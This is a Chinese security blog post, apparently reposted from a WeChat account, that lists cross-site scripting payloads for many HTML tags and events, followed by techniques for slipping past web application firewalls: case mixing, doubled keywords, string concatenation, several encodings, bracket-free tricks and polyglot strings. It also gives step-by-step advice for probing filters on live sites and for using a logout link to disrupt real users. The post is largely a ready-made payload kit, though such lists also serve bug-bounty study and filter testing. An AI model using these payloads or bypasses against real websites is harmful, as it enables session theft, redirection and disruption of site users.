<a href="http://www.qq.com">qq</a><a href=javascript:alert('1')>test</a><a href=j"avascript:a" onmouseover="alert(/xss/)">aa</a><a href="" onclick=eval(alert('xss'))>aa</a><a href=kycg.asp?ttt=1000 onmouseover=prompt('xss') y=2016>aa</a>

<input onfocus="alert('xss');">竞争焦点，从而触发onblur事件<input onblur=alert("xss") autofocus><input autofocus>通过autofocus属性执行本身的focus事件，这个变量是使焦点自动跳转到输入元素上,触发焦点事件，无需用户去触发<input onfocus="alert('xss');" autofocus><input value="" onclick=alert('xss') type="text"><input name="name" value="" onmouseover=prompt('xss') bad=""><input name="name" value=""><script>alert('xss')</script>按下按键时触发<input type="text" onkeydown="alert(1)">按下按键时触发<input type="text" onkeypress="alert(1)">松开按键式时触发<input type="text" onkeyup="alert(1)">

<form action=javascript:alert('xss') method="get"><form action=javasript:laert('xss')><form action=1 onmouseover=alert('xss)>

iframe

<iframe onload=alert("xss");></iframe><iframe src=javascript:alert('xss')></iframe><iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe><iframe src="data:text/html;base64,<script>alert('xss')</script>"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="><iframe src="aaa" onmouseover=alert('xss') /><iframe>

<svg onload=alert(1)>

<body onload="alert(1)">利用换行符以及autofocus，自动去触发onscroll事件，无需用户去触发<body onscroll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

元素上点击鼠标时触发<button onclick="alert(1)">text</button>

元素上按下鼠标时触发<p onmousedown="alert(1)">text</p>元素上释放鼠标时触发<p onmouseup="alert(1)">text</p>

<details ontoggle="alert('xss');">使用open属性触发ontoggle事件，无需用户去触发<details open ontoggle="alert('xss');">

<select onfocus=alert(1)></select>通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发<select onfocus=alert(1) autofocus>

<video><source onerror="alert(1)">

<audio src=x onerror=alert("xss");>

</p> <pre><code><textarea onfocus=alert("xss"); autofocus> </code></pre> <p><keygen> </p> <pre><code><keygen autofocus onfocus=alert(1)> //仅限火狐 </code></pre> <p>javascript伪协议 </p> <pre><code><a>标签<a href="javascript:alert('xss');">xss</a><iframe>标签<iframe src=javascript:alert('xss');></iframe><img>标签<img src=javascript:alert('xss')>//IE7以下<form>标签<form action="Javascript:alert(1)"><input type=submit> </code></pre> <p># WAF绕过思路<br /> ## 过滤空格 </p> <pre><code>用 / 代替空格<img/src="x"/onerror=alert("xss");> </code></pre> <p>## 过滤关键字<br /> ### 大小写绕过 </p> <p><ImG sRc=x onerRor=alert("xss");><br /> ### 双写关键字 </p> <p>(有些waf可能会只替换一次且是替换为空，这种情况下我们可以考虑双写关键字绕过，这要根据实战情况下进行改写) </p> <p><imimgg srsrcc=x onerror=alert("xss");><br /> ### 1、字符拼接 </p> <p>比如过滤的是alert(利用eval，不仅仅在img标签中其他标签照样适用可以不断进行改写) </p> <p><img decoding="async" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E" onerror="a=aler;b=t;c='(xss);';eval(a+b+c)" data-lazy-src="x"><noscript><img decoding="async" src="x" onerror="a=aler;b=t;c='(xss);';eval(a+b+c)"></noscript><br /> ### 2、字符拼接 </p> <p>(利用top，不仅仅在script标签中其他标签照样适用可以不断进行改写) </p> <pre><code><script>top["al"+"ert"](``xss``);</script>(只有两个``这里是为了凸显出有`符号) </code></pre> <p>## 其它字符混淆 </p> <pre><code>有的waf可能是用正则表达式去检测是否有xss攻击，如果我们能fuzz出正则的规则，则我们就可以使用其它字符去混淆我们注入的代码了下面举几个简单的例子可利用注释`<<script>alert("xss");//<</script><scri<!--test-->pt>alert("hello world!")</scri<!--test-->pt>`标签的优先级`<title><img src=</title>><img src=x onerror="alert(``xss``);">` 因为title标签的优先级比img的高，所以会先闭合title，从而导致前面的img标签无效`<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>` </code></pre> <p>## 编码绕过 </p> <pre><code>Unicode编码绕过<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;"><img src="x" onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">url编码绕过<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>Ascii码绕过<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">Hex绕过<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>八进制绕过<img src=x onerror=alert('\170\163\163')>base64绕过<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="> </code></pre> <p>过滤括号 </p> <pre><code>当括号被过滤的时候可以使用throw来绕过<svg/onload="window.onerror=eval;throw'=alert\x281\x29';"> </code></pre> <p>过滤url地址 </p> <pre><code>使用url编码<img src="x" onerror=document.location=``http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/``>使用IP<img src="x" onerror=document.location=``http://2130706433/``>十进制<img src="x" onerror=document.location=``http://0177.0.0.01/``>八进制<img src="x" onerror=document.location=``http://0x7f.0x0.0x0.0x1/``>十六进制<img src="x" onerror=document.location=``//www.baidu.com``>html标签中用//可以代替http://使用\ (注意：在windows下\本身就有特殊用途，是一个path 的写法，所以\在Windows下是file协议，在linux下才会是当前域的协议)使用中文逗号代替英文逗号<img src="x" onerror="document.location=``http://www。baidu。com``">//会自动跳转到百度 </code></pre> <p>注意如果有的src直接插入的话，可以使用<img decoding="async" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E" onerror=console.log(alert(document.cookie)); data-lazy-src="x"><noscript><img decoding="async" src="x" onerror=console.log(alert(document.cookie));></noscript><br /> 来测试 </p> <pre><code>限制 ” 符号，输入<img src=1 onclick=alert(‘1’)>限制 ‘ 符号，输入<img src=1 onclick=alert(/1/)>、<img src=1 onclick=”alert(1)”>限制 () 符号，输入<img src=1 onclick=”alert `’1’`”>限制 () ‘ ” 符号，输入<img src=1 onclick=alert `1`> </code></pre> <p>## alert绕过 </p> <pre><code> (alert)(1)a=alert,a(1)[1].find(alert)top[/al/.source+/ert/.source](1)al\u0065rt(1)top[‘al\145rt’](1)top[8680439..toString(30)](1) </code></pre> <p>一些绕过语句 </p> <pre><code><sVG/x=">"/oNloaD=confirm()///*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e </code></pre> <p><lol/onauxclick=[0].some(alert)>rightclick </p> <p><svg onx=() onload=(confirm)(1)> </p> <p><xssBypass/onpointermove=(confirm)(1)>MoveMouseHere </p> <p><svg onx=() onload=(confirm)(1)> </p> <p># 实战中的绕过思路 </p> <p>在实战中每个服务器过滤拦截的参数不同，而真正掌握绕过并不是说利用别人的payload，因为别人的payload很可能在你挖掘漏洞的时候不管用！你要根据实战情况自己去编写绕过语句！不要一看到利用上面的绕过语句绕不过去就放弃了！可以明确告诉你，基本都需要自己来绕过，而且绝大多数xss漏洞都需要进行绕过。XSS绕过中**最重要**<br /> 的就是XSS语句的**跟踪**<br /> ，我们得跟踪我们输入的语句，然后根据服务器的拦截情况不断的去试。一定要多去跟踪，多去尝试！这样你绕过能力就会慢慢提升。<br /> 1、先输入标签看哪些标签会给栏，不要一开始输入整个上面的payload，看哪些标签不给拦，一般第一开始先输入<img><br /> ，找到了不会拦截的标签就好办，然后对照上面绕过的思路进行改写语句，如果不会给拦截的标签绕不过去的话就果断选择下一个。输入标签的时候如果整个标签会给拦，那就先输入一小部分，如<select><br /> 标签会给拦截，那就先输入<se、<sele、<select这样一步一步的进行输入来看到底是怎么给拦截方式，弄懂基本的拦截思路就会比较容易绕过。 2、后面就继续添加，比如会拦截onerror事件，那就先输入one，看还不会给栏，一步一步添加到整个onerror，那就根据上面的绕过思路来实现绕法。 3、有的确实是绕不过去，就不要绕了，我遇到很多绕不过去的，只有img标签可以，但是也可以交一交，就是img标签后的链接更改为退出账号的链接，这样只要对方访问你的评论查看你的内容就自动账号退出，危害还是可以的。 # dvwa靶场的作用 除了刚开始初学者用来理解xss漏洞，更重要的是用来我们平常漏洞的挖掘，就是比如你在WAF绕过的时候，你写了一大串的WAF绕过语句，然后在实战中却没有弹窗成功，此时你需要做的就是将你写的这个WAF绕过语句在靶场中进行测试，如果靶场都不能弹窗成功，那么你就要思考是不是自己的语句写错了。自己在写绕过语句的时候可以先去靶场测试。 **1** ► **福利放送**     再次声明：本公众号及其发布的内容的使用者需自行承担由此产生的任何直接或间接的后果和损失，GG安全公众号和原文章作者不承担任何责任。 **** **edusrc邀请码 | 玄机邀请码**     免费不限量提供edusrc邀请码及 玄机邀请码 ，可在的菜单栏 资源获取-edusrc邀请码  | 玄机邀请码 中获取。  **2** ► **往期精彩** [](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247509586&idx=1&sn=c33b1b3ce59fa2fc523f6b062df185eb&chksm=c09ad502f7ed5c14486802007f8f59ba055137028c3f0a7ebe42547647ab3059ce2a0fea5a21&scene=21#wechat_redirect) [](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247509586&idx=1&sn=c33b1b3ce59fa2fc523f6b062df185eb&chksm=c09ad502f7ed5c14486802007f8f59ba055137028c3f0a7ebe42547647ab3059ce2a0fea5a21&scene=21#wechat_redirect) [](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247509586&idx=1&sn=c33b1b3ce59fa2fc523f6b062df185eb&chksm=c09ad502f7ed5c14486802007f8f59ba055137028c3f0a7ebe42547647ab3059ce2a0fea5a21&scene=21#wechat_redirect) [](https://mp.weixin.qq.com/s?__biz=MzIwMjE2NTM5Mg==&mid=2247485283&idx=1&sn=d26389e1d4ace54a43b2b2c893a474b6&scene=21#wechat_redirect) Edusrc高校证书测评 [](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247509558&idx=1&sn=4ed77b8fbe43290b3fb889465673e9a3&chksm=c09ad566f7ed5c70d7aba88f9aaf96b07004f382627a0f119dd22fe51bd893d3aece18f3917f&scene=21#wechat_redirect) [](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247509558&idx=1&sn=4ed77b8fbe43290b3fb889465673e9a3&chksm=c09ad566f7ed5c70d7aba88f9aaf96b07004f382627a0f119dd22fe51bd893d3aece18f3917f&scene=21#wechat_redirect) [](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247509558&idx=1&sn=4ed77b8fbe43290b3fb889465673e9a3&chksm=c09ad566f7ed5c70d7aba88f9aaf96b07004f382627a0f119dd22fe51bd893d3aece18f3917f&scene=21#wechat_redirect) [](https://mp.weixin.qq.com/s?__biz=MzIwMjE2NTM5Mg==&mid=2247485141&idx=1&sn=ffcd2813da3458253b630dfeb9fbe581&scene=21#wechat_redirect) 绝版乌云重现：在VM中复活的安全宝藏 [](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247509558&idx=1&sn=4ed77b8fbe43290b3fb889465673e9a3&chksm=c09ad566f7ed5c70d7aba88f9aaf96b07004f382627a0f119dd22fe51bd893d3aece18f3917f&scene=21#wechat_redirect) [](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247509558&idx=1&sn=4ed77b8fbe43290b3fb889465673e9a3&chksm=c09ad566f7ed5c70d7aba88f9aaf96b07004f382627a0f119dd22fe51bd893d3aece18f3917f&scene=21#wechat_redirect) [](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247509558&idx=1&sn=4ed77b8fbe43290b3fb889465673e9a3&chksm=c09ad566f7ed5c70d7aba88f9aaf96b07004f382627a0f119dd22fe51bd893d3aece18f3917f&scene=21#wechat_redirect) [](https://mp.weixin.qq.com/s?__biz=MzIwMjE2NTM5Mg==&mid=2247484834&idx=1&sn=f5c5d3ca80704c6fcc466f7c24bd71d5&scene=21#wechat_redirect) 钓鱼佬永不空军！社g之学姐送我“严重”漏洞 </p> </div><!-- .entry-content --> </div><!-- .post-content --> <footer class="entry-footer post-details"> <div class="entry-categories"> <svg class="icon icon-category" aria-hidden="true" role="img"> <use xlink:href="https://blog.cve-20.fyi/wp-content/themes/donovan/assets/icons/genericons-neue.svg#category"></use> </svg><a href="https://blog.cve-20.fyi/archives/category/vx" rel="category tag">vx</a></div> <div class="entry-tags clearfix"> <svg class="icon icon-tag" aria-hidden="true" role="img"> <use xlink:href="https://blog.cve-20.fyi/wp-content/themes/donovan/assets/icons/genericons-neue.svg#tag"></use> </svg><a href="https://blog.cve-20.fyi/archives/tag/rce" rel="tag">RCE</a>, <a href="https://blog.cve-20.fyi/archives/tag/sql%e6%b3%a8%e5%85%a5" rel="tag">SQL注入</a>, <a href="https://blog.cve-20.fyi/archives/tag/vx" rel="tag">vx</a>, <a href="https://blog.cve-20.fyi/archives/tag/xss" rel="tag">XSS</a>, <a href="https://blog.cve-20.fyi/archives/tag/%e4%bb%a3%e7%a0%81" rel="tag">代码</a>, <a href="https://blog.cve-20.fyi/archives/tag/%e5%91%bd%e4%bb%a4%e6%89%a7%e8%a1%8c" rel="tag">命令执行</a>, <a href="https://blog.cve-20.fyi/archives/tag/%e6%bc%8f%e6%b4%9e" rel="tag">漏洞</a> </div><!-- .entry-tags --> </footer><!-- .entry-footer --> </article> <nav class="navigation post-navigation" aria-label="文章"> <h2 class="screen-reader-text">文章导航</h2> <div class="nav-links"><div class="nav-previous"><a href="https://blog.cve-20.fyi/archives/20528" rel="prev"><span class="nav-link-text">上篇文章</span><h3 class="entry-title">NAVIDROME 权限绕过漏洞(CVE-2025-27112)</h3></a></div><div class="nav-next"><a href="https://blog.cve-20.fyi/archives/20380" rel="next"><span class="nav-link-text">下篇文章</span><h3 class="entry-title">CrushFTP新安全漏洞：未授权访问和CVE-2025-31161</h3></a></div></div> </nav> </main><!-- #main --> </div><!-- #primary --> <section id="secondary" class="sidebar widget-area clearfix" role="complementary"> <section id="block-2" class="widget widget_block widget_search"><form role="search" method="get" action="https://blog.cve-20.fyi/" class="wp-block-search__button-outside wp-block-search__text-button wp-block-search" ><label class="wp-block-search__label" for="wp-block-search__input-1" >搜索</label><div class="wp-block-search__inside-wrapper " ><input class="wp-block-search__input" id="wp-block-search__input-1" placeholder="" value="" type="search" name="s" required /><button aria-label="搜索" class="wp-block-search__button wp-element-button" type="submit" >搜索</button></div></form></section><section id="block-3" class="widget widget_block"><div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"><h2 class="wp-block-heading">近期文章</h2><ul class="wp-block-latest-posts__list wp-block-latest-posts"><li><a class="wp-block-latest-posts__post-title" href="https://blog.cve-20.fyi/archives/29931">勒索病毒断网后黄金1小时：精准备份策略决定生死</a></li> <li><a class="wp-block-latest-posts__post-title" href="https://blog.cve-20.fyi/archives/29939">雷神众测漏洞周报2025.7.14-2025.7.20</a></li> <li><a class="wp-block-latest-posts__post-title" href="https://blog.cve-20.fyi/archives/29917">【工具分享】Windows漏洞检查工具：Windows Exploit Suggester – Next Generation</a></li> <li><a class="wp-block-latest-posts__post-title" href="https://blog.cve-20.fyi/archives/29911">PHP代码审计登陆框SQL注入</a></li> <li><a class="wp-block-latest-posts__post-title" href="https://blog.cve-20.fyi/archives/29907">CISP-PTE = 渗透技术（工具+漏洞+实战）+ 国内合规标准（法律+流程）</a></li> </ul></div></div></section><section id="block-4" class="widget widget_block"><div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"><h2 class="wp-block-heading">近期评论</h2><div class="no-comments wp-block-latest-comments">您尚未收到任何评论。</div></div></div></section><section id="block-5" class="widget widget_block"><div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"><h2 class="wp-block-heading">归档</h2><ul class="wp-block-archives-list wp-block-archives"> <li><a href='https://blog.cve-20.fyi/archives/date/2025/07'>2025 年 7 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2025/06'>2025 年 6 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2025/05'>2025 年 5 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2025/04'>2025 年 4 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2025/03'>2025 年 3 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2025/02'>2025 年 2 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2025/01'>2025 年 1 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2024/12'>2024 年 12 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2024/11'>2024 年 11 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2024/10'>2024 年 10 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2024/09'>2024 年 9 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2024/08'>2024 年 8 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2024/07'>2024 年 7 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2024/06'>2024 年 6 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2024/05'>2024 年 5 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2024/04'>2024 年 4 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2024/03'>2024 年 3 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2024/02'>2024 年 2 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2024/01'>2024 年 1 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2023/12'>2023 年 12 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2023/11'>2023 年 11 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2023/10'>2023 年 10 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2023/09'>2023 年 9 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2023/08'>2023 年 8 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2023/07'>2023 年 7 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2023/06'>2023 年 6 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2023/05'>2023 年 5 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2023/04'>2023 年 4 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2023/03'>2023 年 3 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2023/02'>2023 年 2 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2023/01'>2023 年 1 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2022/12'>2022 年 12 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2022/11'>2022 年 11 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2022/10'>2022 年 10 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2022/09'>2022 年 9 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2022/08'>2022 年 8 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2022/07'>2022 年 7 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2022/06'>2022 年 6 月</a></li> <li><a href='https://blog.cve-20.fyi/archives/date/2022/04'>2022 年 4 月</a></li> </ul></div></div></section><section id="block-6" class="widget widget_block"><div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"><h2 class="wp-block-heading">分类</h2><ul class="wp-block-categories-list wp-block-categories"> <li class="cat-item cat-item-10"><a href="https://blog.cve-20.fyi/archives/category/vx">vx</a> </li> </ul></div></div></section> </section><!-- #secondary --> </div><!-- #content --> <div id="footer" class="footer-wrap"> <footer id="colophon" class="site-footer container clearfix" role="contentinfo"> <div id="footer-line" class="site-info"> <span class="credit-link"> WordPress 主题：Donovan 由 ThemeZee 设计。 </span> </div><!-- .site-info --> </footer><!-- #colophon --> </div> </div><!-- #page --> <script type="speculationrules"> {"prefetch":[{"source":"document","where":{"and":[{"href_matches":"\/*"},{"not":{"href_matches":["\/wp-*.php","\/wp-admin\/*","\/wp-content\/uploads\/*","\/wp-content\/*","\/wp-content\/plugins\/*","\/wp-content\/themes\/donovan\/*","\/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]} </script> <script type="text/javascript" id="enlighterjs-js-extra"> /* <![CDATA[ */ var io_code_settings = {"pre_c":"\u00a9 cve-20-blog"}; /* ]]> */ </script> <script type="text/javascript" src="https://blog.cve-20.fyi/wp-content/plugins/io-code-highlight/assets/js/enlighterjs.min.js?ver=2.0.1" id="enlighterjs-js" data-rocket-defer defer></script> <script type="text/javascript" id="rocket-browser-checker-js-after"> /* <![CDATA[ */ "use strict";var _createClass=function(){function defineProperties(target,props){for(var i=0;i<props.length;i++){var descriptor=props[i];descriptor.enumerable=descriptor.enumerable||!1,descriptor.configurable=!0,"value"in descriptor&&(descriptor.writable=!0),Object.defineProperty(target,descriptor.key,descriptor)}}return function(Constructor,protoProps,staticProps){return protoProps&&defineProperties(Constructor.prototype,protoProps),staticProps&&defineProperties(Constructor,staticProps),Constructor}}();function _classCallCheck(instance,Constructor){if(!(instance instanceof Constructor))throw new TypeError("Cannot call a class as a function")}var RocketBrowserCompatibilityChecker=function(){function RocketBrowserCompatibilityChecker(options){_classCallCheck(this,RocketBrowserCompatibilityChecker),this.passiveSupported=!1,this._checkPassiveOption(this),this.options=!!this.passiveSupported&&options}return _createClass(RocketBrowserCompatibilityChecker,[{key:"_checkPassiveOption",value:function(self){try{var options={get passive(){return!(self.passiveSupported=!0)}};window.addEventListener("test",null,options),window.removeEventListener("test",null,options)}catch(err){self.passiveSupported=!1}}},{key:"initRequestIdleCallback",value:function(){!1 in window&&(window.requestIdleCallback=function(cb){var start=Date.now();return setTimeout(function(){cb({didTimeout:!1,timeRemaining:function(){return Math.max(0,50-(Date.now()-start))}})},1)}),!1 in window&&(window.cancelIdleCallback=function(id){return clearTimeout(id)})}},{key:"isDataSaverModeOn",value:function(){return"connection"in navigator&&!0===navigator.connection.saveData}},{key:"supportsLinkPrefetch",value:function(){var elem=document.createElement("link");return elem.relList&&elem.relList.supports&&elem.relList.supports("prefetch")&&window.IntersectionObserver&&"isIntersecting"in IntersectionObserverEntry.prototype}},{key:"isSlowConnection",value:function(){return"connection"in navigator&&"effectiveType"in navigator.connection&&("2g"===navigator.connection.effectiveType||"slow-2g"===navigator.connection.effectiveType)}}]),RocketBrowserCompatibilityChecker}(); /* ]]> */ </script> <script type="text/javascript" id="rocket-preload-links-js-extra"> /* <![CDATA[ */ var RocketPreloadLinksConfig = {"excludeUris":"\/wp-admin\/|\/(?:.+\/)?feed(?:\/(?:.+\/?)?)?$|\/(?:.+\/)?embed\/|\/(index.php\/)?(.*)wp-json(\/.*|$)|\/refer\/|\/go\/|\/recommend\/|\/recommends\/","usesTrailingSlash":"","imageExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|pdf|doc|docx|xls|xlsx|php","fileExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|pdf|doc|docx|xls|xlsx|php|html|htm","siteUrl":"https:\/\/blog.cve-20.fyi","onHoverDelay":"100","rateThrottle":"3"}; /* ]]> */ </script> <script type="text/javascript" id="rocket-preload-links-js-after"> /* <![CDATA[ */ (function() { "use strict";var r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e=function(){function i(e,t){for(var n=0;n<t.length;n++){var i=t[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,i.key,i)}}return function(e,t,n){return t&&i(e.prototype,t),n&&i(e,n),e}}();function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var t=function(){function n(e,t){i(this,n),this.browser=e,this.config=t,this.options=this.browser.options,this.prefetched=new Set,this.eventTime=null,this.threshold=1111,this.numOnHover=0}return e(n,[{key:"init",value:function(){!this.browser.supportsLinkPrefetch()||this.browser.isDataSaverModeOn()||this.browser.isSlowConnection()||(this.regex={excludeUris:RegExp(this.config.excludeUris,"i"),images:RegExp(".("+this.config.imageExt+")$","i"),fileExt:RegExp(".("+this.config.fileExt+")$","i")},this._initListeners(this))}},{key:"_initListeners",value:function(e){-1<this.config.onHoverDelay&&document.addEventListener("mouseover",e.listener.bind(e),e.listenerOptions),document.addEventListener("mousedown",e.listener.bind(e),e.listenerOptions),document.addEventListener("touchstart",e.listener.bind(e),e.listenerOptions)}},{key:"listener",value:function(e){var t=e.target.closest("a"),n=this._prepareUrl(t);if(null!==n)switch(e.type){case"mousedown":case"touchstart":this._addPrefetchLink(n);break;case"mouseover":this._earlyPrefetch(t,n,"mouseout")}}},{key:"_earlyPrefetch",value:function(t,e,n){var i=this,r=setTimeout(function(){if(r=null,0===i.numOnHover)setTimeout(function(){return i.numOnHover=0},1e3);else if(i.numOnHover>i.config.rateThrottle)return;i.numOnHover++,i._addPrefetchLink(e)},this.config.onHoverDelay);t.addEventListener(n,function e(){t.removeEventListener(n,e,{passive:!0}),null!==r&&(clearTimeout(r),r=null)},{passive:!0})}},{key:"_addPrefetchLink",value:function(i){return this.prefetched.add(i.href),new Promise(function(e,t){var n=document.createElement("link");n.rel="prefetch",n.href=i.href,n.onload=e,n.onerror=t,document.head.appendChild(n)}).catch(function(){})}},{key:"_prepareUrl",value:function(e){if(null===e||"object"!==(void 0===e?"undefined":r(e))||!1 in e||-1===["http:","https:"].indexOf(e.protocol))return null;var t=e.href.substring(0,this.config.siteUrl.length),n=this._getPathname(e.href,t),i={original:e.href,protocol:e.protocol,origin:t,pathname:n,href:t+n};return this._isLinkOk(i)?i:null}},{key:"_getPathname",value:function(e,t){var n=t?e.substring(this.config.siteUrl.length):e;return n.startsWith("/")||(n="/"+n),this._shouldAddTrailingSlash(n)?n+"/":n}},{key:"_shouldAddTrailingSlash",value:function(e){return this.config.usesTrailingSlash&&!e.endsWith("/")&&!this.regex.fileExt.test(e)}},{key:"_isLinkOk",value:function(e){return null!==e&&"object"===(void 0===e?"undefined":r(e))&&(!this.prefetched.has(e.href)&&e.origin===this.config.siteUrl&&-1===e.href.indexOf("?")&&-1===e.href.indexOf("#")&&!this.regex.excludeUris.test(e.href)&&!this.regex.images.test(e.href))}}],[{key:"run",value:function(){"undefined"!=typeof RocketPreloadLinksConfig&&new n(new RocketBrowserCompatibilityChecker({capture:!0,passive:!0}),RocketPreloadLinksConfig).init()}}]),n}();t.run(); }()); /* ]]> */ </script> <script type="text/javascript" id="rocket_lazyload_css-js-extra"> /* <![CDATA[ */ var rocket_lazyload_css_data = {"threshold":"300"}; /* ]]> */ </script> <script type="text/javascript" id="rocket_lazyload_css-js-after"> /* <![CDATA[ */ !function o(n,c,a){function u(t,e){if(!c[t]){if(!n[t]){var r="function"==typeof require&&require;if(!e&&r)return r(t,!0);if(s)return s(t,!0);throw(e=new Error("Cannot find module '"+t+"'")).code="MODULE_NOT_FOUND",e}r=c[t]={exports:{}},n[t][0].call(r.exports,function(e){return u(n[t][1][e]||e)},r,r.exports,o,n,c,a)}return c[t].exports}for(var s="function"==typeof require&&require,e=0;e<a.length;e++)u(a[e]);return u}({1:[function(e,t,r){"use strict";{const c="undefined"==typeof rocket_pairs?[]:rocket_pairs,a=(("undefined"==typeof rocket_excluded_pairs?[]:rocket_excluded_pairs).map(t=>{var e=t.selector;document.querySelectorAll(e).forEach(e=>{e.setAttribute("data-rocket-lazy-bg-"+t.hash,"excluded")})}),document.querySelector("#wpr-lazyload-bg-container"));var o=rocket_lazyload_css_data.threshold||300;const u=new IntersectionObserver(e=>{e.forEach(t=>{t.isIntersecting&&c.filter(e=>t.target.matches(e.selector)).map(t=>{var e;t&&((e=document.createElement("style")).textContent=t.style,a.insertAdjacentElement("afterend",e),t.elements.forEach(e=>{u.unobserve(e),e.setAttribute("data-rocket-lazy-bg-"+t.hash,"loaded")}))})})},{rootMargin:o+"px"});function n(){0<(0<arguments.length&&void 0!==arguments[0]?arguments[0]:[]).length&&c.forEach(t=>{try{document.querySelectorAll(t.selector).forEach(e=>{"loaded"!==e.getAttribute("data-rocket-lazy-bg-"+t.hash)&&"excluded"!==e.getAttribute("data-rocket-lazy-bg-"+t.hash)&&(u.observe(e),(t.elements||=[]).push(e))})}catch(e){console.error(e)}})}n(),function(){const r=window.MutationObserver;return function(e,t){if(e&&1===e.nodeType)return(t=new r(t)).observe(e,{attributes:!0,childList:!0,subtree:!0}),t}}()(document.querySelector("body"),n)}},{}]},{},[1]); /* ]]> */ </script> <script type="text/javascript" id="wp-statistics-tracker-js-extra"> /* <![CDATA[ */ var WP_Statistics_Tracker_Object = 